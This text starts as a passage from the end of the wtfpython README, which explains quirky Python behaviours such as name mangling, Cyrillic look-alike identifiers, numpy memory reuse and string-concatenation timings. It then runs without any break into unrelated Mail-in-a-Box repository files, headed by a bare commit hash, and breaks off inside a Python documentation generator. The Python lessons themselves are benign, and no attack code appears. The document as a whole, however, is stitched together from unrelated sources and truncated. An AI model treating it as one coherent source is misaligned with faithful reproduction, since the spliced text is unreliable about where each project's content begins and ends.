statement](https://docs.python.org/3.3/reference/simple_stmts.html#future-statements), it first runs the appropriate code in `future.c` before treating it as a normal import statement. --- ### ▶ Let's meet Friendly Language Uncle For Life <!-- Example ID: 6427fae6-e959-462d-85da-ce4c94ce41be ---> **Output (Python 3.x)** ```py >>> from __future__ import barry_as_FLUFL >>> "Ruby" != "Python" # there's no doubt about it File "some_file.py", line 1 "Ruby" != "Python" ^ SyntaxError: invalid syntax >>> "Ruby" <> "Python" True ``` There we go. 
#### 💡 Explanation: - This is relevant to [PEP-401](https://www.python.org/dev/peps/pep-0401/) released on April 1, 2009 (now you know, what it means). - Quoting from the PEP-401 > Recognized that the != inequality operator in Python 3.0 was a horrible, finger-pain inducing mistake, the FLUFL reinstates the <> diamond operator as the sole spelling. - There were more things that Uncle Barry had to share in the PEP; you can read them [here](https://www.python.org/dev/peps/pep-0401/). - It works well in an interactive environment, but it will raise a `SyntaxError` when you run via python file (see this [issue](https://github.com/satwikkansal/wtfpython/issues/94)). However, you can wrap the statement inside an `eval` or `compile` to get it working, ```py from __future__ import barry_as_FLUFL print(eval('"Ruby" <> "Python"')) ``` --- ### ▶ Even Python understands that love is complicated <!-- Example ID: b93cad9e-d341-45d1-999c-fcdce65bed25 ---> ```py import this ``` Wait, what's **this**? `this` is love :heart: **Output:** ``` The Zen of Python, by Tim Peters Beautiful is better than ugly. Explicit is better than implicit. Simple is better than complex. Complex is better than complicated. Flat is better than nested. Sparse is better than dense. Readability counts. Special cases aren't special enough to break the rules. Although practicality beats purity. Errors should never pass silently. Unless explicitly silenced. In the face of ambiguity, refuse the temptation to guess. There should be one-- and preferably only one --obvious way to do it. Although that way may not be obvious at first unless you're Dutch. Now is better than never. Although never is often better than *right* now. If the implementation is hard to explain, it's a bad idea. If the implementation is easy to explain, it may be a good idea. Namespaces are one honking great idea -- let's do more of those! ``` It's the Zen of Python! ```py >>> love = this >>> this is love True >>> love is True False >>> love is False False >>> love is not True or False True >>> love is not True or False; love is love # Love is complicated True ``` #### 💡 Explanation: * `this` module in Python is an easter egg for The Zen Of Python ([PEP 20](https://www.python.org/dev/peps/pep-0020)). * And if you think that's already interesting enough, check out the implementation of [this.py](https://hg.python.org/cpython/file/c3896275c0f6/Lib/this.py). Interestingly, **the code for the Zen violates itself** (and that's probably the only place where this happens). * Regarding the statement `love is not True or False; love is love`, ironic but it's self-explanatory (if not, please see the examples related to `is` and `is not` operators). --- ### ▶ Yes, it exists! <!-- Example ID: 4286db3d-1ea7-47c9-8fb6-a9a04cac6e49 ---> **The `else` clause for loops.** One typical example might be: ```py def does_exists_num(l, to_find): for num in l: if num == to_find: print("Exists!") break else: print("Does not exist") ``` **Output:** ```py >>> some_list = [1, 2, 3, 4, 5] >>> does_exists_num(some_list, 4) Exists! >>> does_exists_num(some_list, -1) Does not exist ``` **The `else` clause in exception handling.** An example, ```py try: pass except: print("Exception occurred!!!") else: print("Try block executed successfully...") ``` **Output:** ```py Try block executed successfully... ``` #### 💡 Explanation: - The `else` clause after a loop is executed only when there's no explicit `break` after all the iterations. You can think of it as a "nobreak" clause. 
- `else` clause after a try block is also called "completion clause" as reaching the `else` clause in a `try` statement means that the try block actually completed successfully. --- ### ▶ Ellipsis * <!-- Example ID: 969b7100-ab3d-4a7d-ad7d-a6be16181b2b ---> ```py def some_func(): Ellipsis ``` **Output** ```py >>> some_func() # No output, No Error >>> SomeRandomString Traceback (most recent call last): File "<stdin>", line 1, in <module> NameError: name 'SomeRandomString' is not defined >>> Ellipsis Ellipsis ``` #### 💡 Explanation - In Python, `Ellipsis` is a globally available built-in object which is equivalent to `...`. ```py >>> ... Ellipsis ``` - Ellipsis can be used for several purposes, + As a placeholder for code that hasn't been written yet (just like `pass` statement) + In slicing syntax to represent the full slices in remaining direction ```py >>> import numpy as np >>> three_dimensional_array = np.arange(8).reshape(2, 2, 2) array([ [ [0, 1], [2, 3] ], [ [4, 5], [6, 7] ] ]) ``` So our `three_dimensional_array` is an array of array of arrays. Let's say we want to print the second element (index `1`) of all the innermost arrays, we can use Ellipsis to bypass all the preceding dimensions ```py >>> three_dimensional_array[:,:,1] array([[1, 3], [5, 7]]) >>> three_dimensional_array[..., 1] # using Ellipsis. array([[1, 3], [5, 7]]) ``` Note: this will work for any number of dimensions. You can even select slice in first and last dimension and ignore the middle ones this way (`n_dimensional_array[firs_dim_slice, ..., last_dim_slice]`) + In [type hinting](https://docs.python.org/3/library/typing.html) to indicate only a part of the type (like `(Callable[..., int]` or `Tuple[str, ...]`)) + You may also use Ellipsis as a default function argument (in the cases when you want to differentiate between the "no argument passed" and "None value passed" scenarios). --- ### ▶ Inpinity <!-- Example ID: ff473ea8-a3b1-4876-a6f0-4378aff790c1 ---> The spelling is intended. Please, don't submit a patch for this. **Output (Python 3.x):** ```py >>> infinity = float('infinity') >>> hash(infinity) 314159 >>> hash(float('-inf')) -314159 ``` #### 💡 Explanation: - Hash of infinity is 10⁵ x π. - Interestingly, the hash of `float('-inf')` is "-10⁵ x π" in Python 3, whereas "-10⁵ x e" in Python 2. --- ### ▶ Let's mangle <!-- Example ID: 37146d2d-9e67-43a9-8729-3c17934b910c ---> 1\. ```py class Yo(object): def __init__(self): self.__honey = True self.bro = True ``` **Output:** ```py >>> Yo().bro True >>> Yo().__honey AttributeError: 'Yo' object has no attribute '__honey' >>> Yo()._Yo__honey True ``` 2\. ```py class Yo(object): def __init__(self): # Let's try something symmetrical this time self.__honey__ = True self.bro = True ``` **Output:** ```py >>> Yo().bro True >>> Yo()._Yo__honey__ Traceback (most recent call last): File "<stdin>", line 1, in <module> AttributeError: 'Yo' object has no attribute '_Yo__honey__' ``` Why did `Yo()._Yo__honey` work? 3\. ```py _A__variable = "Some value" class A(object): def some_func(self): return __variable # not initialized anywhere yet ``` **Output:** ```py >>> A().__variable Traceback (most recent call last): File "<stdin>", line 1, in <module> AttributeError: 'A' object has no attribute '__variable' >>> A().some_func() 'Some value' ``` #### 💡 Explanation: * [Name Mangling](https://en.wikipedia.org/wiki/Name_mangling) is used to avoid naming collisions between different namespaces. 
* In Python, the interpreter modifies (mangles) the class member names starting with `__` (double underscore a.k.a "dunder") and not ending with more than one trailing underscore by adding `_NameOfTheClass` in front. * So, to access `__honey` attribute in the first snippet, we had to append `_Yo` to the front, which would prevent conflicts with the same name attribute defined in any other class. * But then why didn't it work in the second snippet? Because name mangling excludes the names ending with double underscores. * The third snippet was also a consequence of name mangling. The name `__variable` in the statement `return __variable` was mangled to `_A__variable`, which also happens to be the name of the variable we declared in the outer scope. * Also, if the mangled name is longer than 255 characters, truncation will happen. --- --- ## Section: Appearances are deceptive! ### ▶ Skipping lines? <!-- Example ID: d50bbde1-fb9d-4735-9633-3444b9d2f417 ---> **Output:** ```py >>> value = 11 >>> valuе = 32 >>> value 11 ``` Wut? **Note:** The easiest way to reproduce this is to simply copy the statements from the above snippet and paste them into your file/shell. #### 💡 Explanation Some non-Western characters look identical to letters in the English alphabet but are considered distinct by the interpreter. ```py >>> ord('е') # cyrillic 'e' (Ye) 1077 >>> ord('e') # latin 'e', as used in English and typed using standard keyboard 101 >>> 'е' == 'e' False >>> value = 42 # latin e >>> valuе = 23 # cyrillic 'e', Python 2.x interpreter would raise a `SyntaxError` here >>> value 42 ``` The built-in `ord()` function returns a character's Unicode [code point](https://en.wikipedia.org/wiki/Code_point), and different code positions of Cyrillic 'e' and Latin 'e' justify the behavior of the above example. --- ### ▶ Teleportation <!-- Example ID: edafe923-0c20-4315-b6e1-0c31abfc38f5 ---> ```py # `pip install numpy` first. import numpy as np def energy_send(x): # Initializing a numpy array np.array([float(x)]) def energy_receive(): # Return an empty numpy array return np.empty((), dtype=np.float).tolist() ``` **Output:** ```py >>> energy_send(123.456) >>> energy_receive() 123.456 ``` Where's the Nobel Prize? #### 💡 Explanation: * Notice that the numpy array created in the `energy_send` function is not returned, so that memory space is free to reallocate. * `numpy.empty()` returns the next free memory slot without reinitializing it. This memory spot just happens to be the same one that was just freed (usually, but not always). --- ### ▶ Well, something is fishy... <!-- Example ID: cb6a37c5-74f7-44ca-b58c-3b902419b362 ---> ```py def square(x): """ A simple function to calculate the square of a number by addition. """ sum_so_far = 0 for counter in range(x): sum_so_far = sum_so_far + x return sum_so_far ``` **Output (Python 2.x):** ```py >>> square(10) 10 ``` Shouldn't that be 100? **Note:** If you're not able to reproduce this, try running the file [mixed_tabs_and_spaces.py](/mixed_tabs_and_spaces.py) via the shell. #### 💡 Explanation * **Don't mix tabs and spaces!** The character just preceding return is a "tab", and the code is indented by multiple of "4 spaces" elsewhere in the example. * This is how Python handles tabs: > First, tabs are replaced (from left to right) by one to eight spaces such that the total number of characters up to and including the replacement is a multiple of eight <...> * So the "tab" at the last line of `square` function is replaced with eight spaces, and it gets into the loop. 
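  You can mimic that replacement rule with `str.expandtabs` (just an illustration of the quoted rule; the default tab size is 8),

  ```py
  >>> len("\t".expandtabs())      # a lone tab becomes 8 spaces
  8
  >>> len("    \t".expandtabs())  # 4 spaces plus a tab still ends at a multiple of 8
  8
  ```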
* Python 3 is kind enough to throw an error for such cases automatically. **Output (Python 3.x):** ```py TabError: inconsistent use of tabs and spaces in indentation ``` --- --- ## Section: Miscellaneous ### ▶ `+=` is faster <!-- Example ID: bfd19c60-a807-4a26-9598-4912b86ddb36 ---> ```py # using "+", three strings: >>> timeit.timeit("s1 = s1 + s2 + s3", setup="s1 = ' ' * 100000; s2 = ' ' * 100000; s3 = ' ' * 100000", number=100) 0.25748300552368164 # using "+=", three strings: >>> timeit.timeit("s1 += s2 + s3", setup="s1 = ' ' * 100000; s2 = ' ' * 100000; s3 = ' ' * 100000", number=100) 0.012188911437988281 ``` #### 💡 Explanation: + `+=` is faster than `+` for concatenating more than two strings because the first string (example, `s1` for `s1 += s2 + s3`) is not destroyed while calculating the complete string. --- ### ▶ Let's make a giant string! <!-- Example ID: c7a07424-63fe-4504-9842-8f3d334f28fc ---> ```py def add_string_with_plus(iters): s = "" for i in range(iters): s += "xyz" assert len(s) == 3*iters def add_bytes_with_plus(iters): s = b"" for i in range(iters): s += b"xyz" assert len(s) == 3*iters def add_string_with_format(iters): fs = "{}"*iters s = fs.format(*(["xyz"]*iters)) assert len(s) == 3*iters def add_string_with_join(iters): l = [] for i in range(iters): l.append("xyz") s = "".join(l) assert len(s) == 3*iters def convert_list_to_string(l, iters): s = "".join(l) assert len(s) == 3*iters ``` **Output:** ```py # Executed in ipython shell using %timeit for better readability of results. # You can also use the timeit module in normal python shell/scriptm=, example usage below # timeit.timeit('add_string_with_plus(10000)', number=1000, globals=globals()) >>> NUM_ITERS = 1000 >>> %timeit -n1000 add_string_with_plus(NUM_ITERS) 124 µs ± 4.73 µs per loop (mean ± std. dev. of 7 runs, 100 loops each) >>> %timeit -n1000 add_bytes_with_plus(NUM_ITERS) 211 µs ± 10.5 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each) >>> %timeit -n1000 add_string_with_format(NUM_ITERS) 61 µs ± 2.18 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each) >>> %timeit -n1000 add_string_with_join(NUM_ITERS) 117 µs ± 3.21 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each) >>> l = ["xyz"]*NUM_ITERS >>> %timeit -n1000 convert_list_to_string(l, NUM_ITERS) 10.1 µs ± 1.06 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each) ``` Let's increase the number of iterations by a factor of 10. ```py >>> NUM_ITERS = 10000 >>> %timeit -n1000 add_string_with_plus(NUM_ITERS) # Linear increase in execution time 1.26 ms ± 76.8 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each) >>> %timeit -n1000 add_bytes_with_plus(NUM_ITERS) # Quadratic increase 6.82 ms ± 134 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each) >>> %timeit -n1000 add_string_with_format(NUM_ITERS) # Linear increase 645 µs ± 24.5 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each) >>> %timeit -n1000 add_string_with_join(NUM_ITERS) # Linear increase 1.17 ms ± 7.25 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each) >>> l = ["xyz"]*NUM_ITERS >>> %timeit -n1000 convert_list_to_string(l, NUM_ITERS) # Linear increase 86.3 µs ± 2 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each) ``` #### 💡 Explanation - You can read more about [timeit](https://docs.python.org/3/library/timeit.html) or [%timeit](https://ipython.org/ipython-doc/dev/interactive/magics.html#magic-timeit) on these links. They are used to measure the execution time of code pieces. 
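  If you're not in an IPython shell, a rough sketch with the plain `timeit` module gives comparable numbers (absolute timings will differ on your machine; this assumes the functions above are already defined in the current session),

  ```py
  import timeit

  # time the string-building helpers defined above
  for func in ("add_string_with_plus", "add_string_with_join"):
      best = min(timeit.repeat(f"{func}(1000)", repeat=5, number=100, globals=globals()))
      print(func, best)
  ```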
- Don't use `+` for generating long strings — In Python, `str` is immutable, so the left and right strings have to be copied into the new string for every pair of concatenations. If you concatenate four strings of length 10, you'll be copying (10+10) + ((10+10)+10) + (((10+10)+10)+10) = 90 characters instead of just 40 characters. Things get quadratically worse as the number and size of the strings increase (as seen in the execution times of the `add_bytes_with_plus` function).
- Therefore, it's advised to use the `.format()` or `%` syntax (however, they are slightly slower than `+` for very short strings).
- Or better, if you already have the contents available in the form of an iterable object, use `''.join(iterable_object)`, which is much faster.
- Unlike `add_bytes_with_plus`, `add_string_with_plus` didn't show a quadratic increase in execution time because of the `+=` optimizations discussed in the previous example. Had the statement been `s = s + "x" + "y" + "z"` instead of `s += "xyz"`, the increase would have been quadratic.

  ```py
  def add_string_with_plus(iters):
      s = ""
      for i in range(iters):
          s = s + "x" + "y" + "z"
      assert len(s) == 3*iters

  >>> %timeit -n100 add_string_with_plus(1000)
  388 µs ± 22.4 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each)
  >>> %timeit -n100 add_string_with_plus(10000) # Quadratic increase in execution time
  9 ms ± 298 µs per loop (mean ± std. dev. of 7 runs, 100 loops each)
  ```
- So many ways to format and create a giant string are somewhat in contrast to the [Zen of Python](https://www.python.org/dev/peps/pep-0020/), according to which,

  > There should be one-- and preferably only one --obvious way to do it.

---

### ▶ Slowing down `dict` lookups *
<!-- Example ID: c9c26ce6-df0c-47f7-af0b-966b9386d4c3 --->

```py
some_dict = {str(i): 1 for i in range(1_000_000)}
another_dict = {str(i): 1 for i in range(1_000_000)}
```

**Output:**
```py
>>> %timeit some_dict['5']
28.6 ns ± 0.115 ns per loop (mean ± std. dev. of 7 runs, 10000000 loops each)
>>> some_dict[1] = 1
>>> %timeit some_dict['5']
37.2 ns ± 0.265 ns per loop (mean ± std. dev. of 7 runs, 10000000 loops each)

>>> %timeit another_dict['5']
28.5 ns ± 0.142 ns per loop (mean ± std. dev. of 7 runs, 10000000 loops each)
>>> another_dict[1]  # Trying to access a key that doesn't exist
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
KeyError: 1
>>> %timeit another_dict['5']
38.5 ns ± 0.0913 ns per loop (mean ± std. dev. of 7 runs, 10000000 loops each)
```

Why are the same lookups becoming slower?

#### 💡 Explanation:
+ CPython has a generic dictionary lookup function that handles all types of keys (`str`, `int`, any object ...), and a specialized one for the common case of dictionaries composed of `str`-only keys.
+ The specialized function (named `lookdict_unicode` in CPython's [source](https://github.com/python/cpython/blob/522691c46e2ae51faaad5bbbce7d959dd61770df/Objects/dictobject.c#L841)) knows all existing keys (including the looked-up key) are strings, and uses the faster & simpler string comparison to compare keys, instead of calling the `__eq__` method.
+ The first time a `dict` instance is accessed with a non-`str` key, it's modified so that future lookups use the generic function.
+ This process is not reversible for the particular `dict` instance, and the key doesn't even have to exist in the dictionary. That's why attempting a failed lookup has the same effect.
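If you want to reproduce the slowdown outside IPython, here's a rough sketch using the plain `timeit` module (the exact nanosecond figures will vary with your CPython version and hardware),

```py
import timeit

setup = "d = {str(i): 1 for i in range(1_000_000)}"

# str-only keys: the specialized lookup function is used
print(timeit.timeit("d['5']", setup=setup, number=10_000_000))

# insert a single non-str key first: every later lookup takes the generic path
print(timeit.timeit("d['5']", setup=setup + "; d[1] = 1", number=10_000_000))
```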
### ▶ Bloating instance `dict`s * <!-- Example ID: fe706ab4-1615-c0ba-a078-76c98cbe3f48 ---> ```py import sys class SomeClass: def __init__(self): self.some_attr1 = 1 self.some_attr2 = 2 self.some_attr3 = 3 self.some_attr4 = 4 def dict_size(o): return sys.getsizeof(o.__dict__) ``` **Output:** (Python 3.8, other Python 3 versions may vary a little) ```py >>> o1 = SomeClass() >>> o2 = SomeClass() >>> dict_size(o1) 104 >>> dict_size(o2) 104 >>> del o1.some_attr1 >>> o3 = SomeClass() >>> dict_size(o3) 232 >>> dict_size(o1) 232 ``` Let's try again... In a new interpreter: ```py >>> o1 = SomeClass() >>> o2 = SomeClass() >>> dict_size(o1) 104 # as expected >>> o1.some_attr5 = 5 >>> o1.some_attr6 = 6 >>> dict_size(o1) 360 >>> dict_size(o2) 272 >>> o3 = SomeClass() >>> dict_size(o3) 232 ``` What makes those dictionaries become bloated? And why are newly created objects bloated as well? #### 💡 Explanation: + CPython is able to reuse the same "keys" object in multiple dictionaries. This was added in [PEP 412](https://www.python.org/dev/peps/pep-0412/) with the motivation to reduce memory usage, specifically in dictionaries of instances - where keys (instance attributes) tend to be common to all instances. + This optimization is entirely seamless for instance dictionaries, but it is disabled if certain assumptions are broken. + Key-sharing dictionaries do not support deletion; if an instance attribute is deleted, the dictionary is "unshared", and key-sharing is disabled for all future instances of the same class. + Additionally, if the dictionary keys have been resized (because new keys are inserted), they are kept shared *only* if they are used by a exactly single dictionary (this allows adding many attributes in the `__init__` of the very first created instance, without causing an "unshare"). If multiple instances exist when a resize happens, key-sharing is disabled for all future instances of the same class: CPython can't tell if your instances are using the same set of attributes anymore, and decides to bail out on attempting to share their keys. + A small tip, if you aim to lower your program's memory footprint: don't delete instance attributes, and make sure to initialize all attributes in your `__init__`! ### ▶ Minor Ones * <!-- Example ID: f885cb82-f1e4-4daa-9ff3-972b14cb1324 ---> * `join()` is a string operation instead of list operation. (sort of counter-intuitive at first usage) **💡 Explanation:** If `join()` is a method on a string, then it can operate on any iterable (list, tuple, iterators). If it were a method on a list, it'd have to be implemented separately by every type. Also, it doesn't make much sense to put a string-specific method on a generic `list` object API. * Few weird looking but semantically correct statements: + `[] = ()` is a semantically correct statement (unpacking an empty `tuple` into an empty `list`) + `'a'[0][0][0][0][0]` is also semantically correct, because Python doesn't have a character data type like other languages branched from C. So selecting a single character from a string returns a single-character string. + `3 --0-- 5 == 8` and `--5 == 5` are both semantically correct statements and evaluate to `True`. * Given that `a` is a number, `++a` and `--a` are both valid Python statements but don't behave the same way as compared with similar statements in languages like C, C++, or Java. ```py >>> a = 5 >>> a 5 >>> ++a 5 >>> --a 5 ``` **💡 Explanation:** + There is no `++` operator in Python grammar. It is actually two `+` operators. 
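    You can confirm this by looking at the parse tree (output shown here is from CPython 3.8; the exact formatting may differ slightly across versions),

    ```py
    >>> import ast
    >>> ast.dump(ast.parse("++a", mode="eval").body)
    "UnaryOp(op=UAdd(), operand=UnaryOp(op=UAdd(), operand=Name(id='a', ctx=Load())))"
    ```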
  + `++a` parses as `+(+a)`, which translates to `a`. Similarly, the output of the statement `--a` can be justified.
  + This StackOverflow [thread](https://stackoverflow.com/questions/3654830/why-are-there-no-and-operators-in-python) discusses the rationale behind the absence of increment and decrement operators in Python.

* You might already be aware of the walrus operator in Python. But have you ever heard of *the space-invader operator*?

  ```py
  >>> a = 42
  >>> a -=- 1
  >>> a
  43
  ```

  It can be used as an alternative increment operator, together with another one,

  ```py
  >>> a +=+ 1
  >>> a
  44
  ```

  **💡 Explanation:** This prank comes from [Raymond Hettinger's tweet](https://twitter.com/raymondh/status/1131103570856632321?lang=en). The space-invader operator is actually just a malformatted `a -= (-1)`, which is equivalent to `a = a - (-1)`. The same goes for the `a += (+ 1)` case.

* Python has an undocumented [converse implication](https://en.wikipedia.org/wiki/Converse_implication) operator.

  ```py
  >>> False ** False == True
  True
  >>> False ** True == False
  True
  >>> True ** False == True
  True
  >>> True ** True == True
  True
  ```

  **💡 Explanation:** If you replace `False` and `True` with 0 and 1 and do the maths, the truth table is equivalent to that of a converse implication operator. ([Source](https://github.com/cosmologicon/pywat/blob/master/explanation.md#the-undocumented-converse-implication-operator))

* Since we are talking about operators, there's also the `@` operator for matrix multiplication (don't worry, this time it's for real).

  ```py
  >>> import numpy as np
  >>> np.array([2, 2, 2]) @ np.array([7, 8, 8])
  46
  ```

  **💡 Explanation:** The `@` operator was added in Python 3.5 with the scientific community in mind. Any object can overload the `__matmul__` magic method to define behavior for this operator.

* From Python 3.8 onwards you can use the f-string syntax `f'{some_var=}'` for quick debugging. Example,

  ```py
  >>> some_string = "wtfpython"
  >>> f'{some_string=}'
  "some_string='wtfpython'"
  ```

* Python uses 2 bytes for local variable storage in functions. In theory, this means that only 65536 variables can be defined in a function. However, Python has a handy solution built in that can be used to store more than 2^16 variable names. The following code demonstrates what happens in the stack when more than 65536 local variables are defined (Warning: This code prints around 2^18 lines of text, so be prepared!):

  ```py
  import dis
  exec("""
  def f():
      """ + """
      """.join(["X" + str(x) + "=" + str(x) for x in range(65539)]))

  f()

  print(dis.dis(f))
  ```

* Multiple Python threads won't run your *Python code* concurrently (yes, you heard it right!). It may seem intuitive to spawn several threads and let them execute your Python code concurrently, but, because of the [Global Interpreter Lock](https://wiki.python.org/moin/GlobalInterpreterLock) in Python, all you're doing is making your threads execute on the same core turn by turn. Python threads are good for IO-bound tasks, but to achieve actual parallelization in Python for CPU-bound tasks, you might want to use the Python [multiprocessing](https://docs.python.org/3/library/multiprocessing.html) module.

* Sometimes, the `print` function might not print values immediately. For example,

  ```py
  # File some_file.py
  import time

  print("wtfpython", end="_")
  time.sleep(3)
  ```

  This will print `wtfpython` only after 3 seconds, due to the `end` argument: the output buffer is flushed either after encountering a `\n` or when the program finishes execution.
  We can force the buffer to be flushed by passing the `flush=True` argument to `print`.

* List slicing with out-of-bounds indices throws no errors,

  ```py
  >>> some_list = [1, 2, 3, 4, 5]
  >>> some_list[111:]
  []
  ```

* Slicing an iterable does not always create a new object. For example,

  ```py
  >>> some_str = "wtfpython"
  >>> some_list = ['w', 't', 'f', 'p', 'y', 't', 'h', 'o', 'n']
  >>> some_list is some_list[:] # False expected because a new object is created.
  False
  >>> some_str is some_str[:] # True because strings are immutable, so making a new object isn't of much use.
  True
  ```

* `int('١٢٣٤٥٦٧٨٩')` returns `123456789` in Python 3. In Python, decimal characters include digit characters, and all characters that can be used to form decimal-radix numbers, e.g. U+0660, ARABIC-INDIC DIGIT ZERO. Here's an [interesting story](https://chris.improbable.org/2014/8/25/adventures-in-unicode-digits/) related to this behavior of Python.

* You can separate numeric literals with underscores (for better readability) from Python 3.6 onwards.

  ```py
  >>> six_million = 6_000_000
  >>> six_million
  6000000
  >>> hex_address = 0xF00D_CAFE
  >>> hex_address
  4027435774
  ```

* `'abc'.count('') == 4`. Here's an approximate implementation of the `count` method, which should make things clearer,

  ```py
  def count(s, sub):
      result = 0
      for i in range(len(s) + 1 - len(sub)):
          result += (s[i:i + len(sub)] == sub)
      return result
  ```

  The behavior is due to the matching of the empty substring (`''`) with slices of length 0 in the original string.

---
---

# Contributing

A few ways in which you can contribute to wtfpython,

- Suggesting new examples
- Helping with translation (See [issues labeled translation](https://github.com/satwikkansal/wtfpython/issues?q=is%3Aissue+is%3Aopen+label%3Atranslation))
- Minor corrections like pointing out outdated snippets, typos, formatting errors, etc.
- Identifying gaps (things like inadequate explanation, redundant examples, etc.)
- Any creative suggestions to make this project more fun and useful

Please see [CONTRIBUTING.md](/CONTRIBUTING.md) for more details. Feel free to create a new [issue](https://github.com/satwikkansal/wtfpython/issues/new) to discuss things.

PS: Please don't reach out with backlinking requests; no links will be added unless they're highly relevant to the project.

# Acknowledgements

The idea and design for this collection were initially inspired by Denys Dovhan's awesome project [wtfjs](https://github.com/denysdovhan/wtfjs). The overwhelming support by Pythonistas gave it the shape it is in right now.

#### Some nice Links!
* https://www.youtube.com/watch?v=sH4XF6pKKmk
* https://www.reddit.com/r/Python/comments/3cu6ej/what_are_some_wtf_things_about_python
* https://sopython.com/wiki/Common_Gotchas_In_Python
* https://stackoverflow.com/questions/530530/python-2-x-gotchas-and-landmines
* https://stackoverflow.com/questions/1011431/common-pitfalls-in-python
* https://www.python.org/doc/humor/
* https://github.com/cosmologicon/pywat#the-undocumented-converse-implication-operator
* https://github.com/wemake-services/wemake-python-styleguide/search?q=wtfpython&type=Issues
* WTFPython discussion threads on [Hacker News](https://news.ycombinator.com/item?id=21862073) and [Reddit](https://www.reddit.com/r/programming/comments/edsh3q/what_the_fck_python_30_exploring_and/).
# 🎓 License [![WTFPL 2.0][license-image]][license-url] &copy; [Satwik Kansal](https://satwikkansal.xyz) [license-url]: http://www.wtfpl.net [license-image]: https://img.shields.io/badge/License-WTFPL%202.0-lightgrey.svg?style=flat-square ## Surprise your friends as well! If you like wtfpython, you can use these quick links to share it with your friends, [Twitter](https://twitter.com/intent/tweet?url=https://github.com/satwikkansal/wtfpython&text=If%20you%20really%20think%20you%20know%20Python,%20think%20once%20more!%20Check%20out%20wtfpython&hashtags=python,wtfpython) | [Linkedin](https://www.linkedin.com/shareArticle?url=https://github.com/satwikkansal&title=What%20the%20f*ck%20Python!&summary=If%20you%20really%20thing%20you%20know%20Python,%20think%20once%20more!) | [Facebook](https://www.facebook.com/dialog/share?app_id=536779657179021&display=page&href=https%3A%2F%2Fgithub.com%2Fsatwikkansal%2Fwtfpython&quote=If%20you%20really%20think%20you%20know%20Python%2C%20think%20once%20more!) ## Need a pdf version? I've received a few requests for the pdf (and epub) version of wtfpython. You can add your details [here](https://form.jotform.com/221593245656057) to get them as soon as they are finished. **That's all folks!** For upcoming content like this, you can add your email [here](https://form.jotform.com/221593598380062).
mailinabox
ca123515aad102327701b18a7d65d180f800b815
File: tools/mail.py #!/bin/bash # This script has moved. management/cli.py "$@" File: tools/readable_bash.py #!/usr/bin/python3 # # Generate documentation for how this machine works by # parsing our bash scripts! import cgi, re import markdown from modgrammar import * def generate_documentation(): print("""<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="viewport" content="width=device-width"> <title>Build Your Own Mail Server From Scratch</title> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.2.0/css/bootstrap.min.css"> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.2.0/css/bootstrap-theme.min.css"> <style> @import url(https://fonts.googleapis.com/css?family=Iceland); @import url(https://fonts.googleapis.com/css?family=Raleway:400,700); @import url(https://fonts.googleapis.com/css?family=Ubuntu:300,500); body { font-family: Raleway, sans-serif; font-size: 16px; color: #555; } h2, h3 { margin-top: .25em; margin-bottom: .75em; } p { margin-bottom: 1em; } .intro p { margin: 1.5em 0; } li { margin-bottom: .33em; } .sourcefile { padding-top: 1.5em; padding-bottom: 1em; font-size: 90%; text-align: right; } .sourcefile a { color: red; } .instructions .row.contd { border-top: 1px solid #E0E0E0; } .prose { padding-top: 1em; padding-bottom: 1em; } .terminal { background-color: #EEE; padding-top: 1em; padding-bottom: 1em; } ul { padding-left: 1.25em; } pre { color: black; border: 0; background: none; font-size: 100%; } div.write-to { margin: 0 0 1em .5em; } div.write-to p { padding: .5em; margin: 0; } div.write-to .filename { padding: .25em .5em; background-color: #666; color: white; font-family: monospace; font-weight: bold; } div.write-to .filename span { font-family: sans-serif; font-weight: normal; } div.write-to pre { margin: 0; padding: .5em; border: 1px solid #999; border-radius: 0; font-size: 90%; } pre.shell > div:before { content: "$ "; color: #666; } </style> </head> <body> <div class="container"> <div class="row intro"> <div class="col-xs-12"> <h1>Build Your Own Mail Server From Scratch</h1> <p>Here&rsquo;s how you can build your own mail server from scratch.</p> <p>This document is generated automatically from <a href="https://mailinabox.email">Mail-in-a-Box</a>&rsquo;s setup script <a href="https://github.com/mail-in-a-box/mailinabox">source code</a>.</p> <hr> </div> </div> <div class="container instructions"> """) parser = Source.parser() with open("setup/start.sh", "r") as start_file: for line in start_file: try: fn = parser.parse_string(line).filename() except: continue if fn in ("setup/start.sh", "setup/preflight.sh", "setup/questions.sh", "setup/firstuser.sh", "setup/management.sh"): continue import sys print(fn, file=sys.stderr) print(BashScript.parse(fn)) print(""" <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.10.1/jquery.min.js"></script> <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.2.0/js/bootstrap.min.js"></script> <script> $(function() { $('.terminal').each(function() { $(this).outerHeight( $(this).parent().innerHeight() ); }); }) </script> </body> </html> """) class HashBang(Grammar): grammar = (L('#!'), REST_OF_LINE, EOL) def value(self): return "" def strip_indent(s): s = s.replace("\t", " ") lines = s.split("\n") try: min_indent = min(len(re.match(r"\s*", line).group(0)) for line in lines if len(line) > 0) except ValueError: # No non-empty lines. 
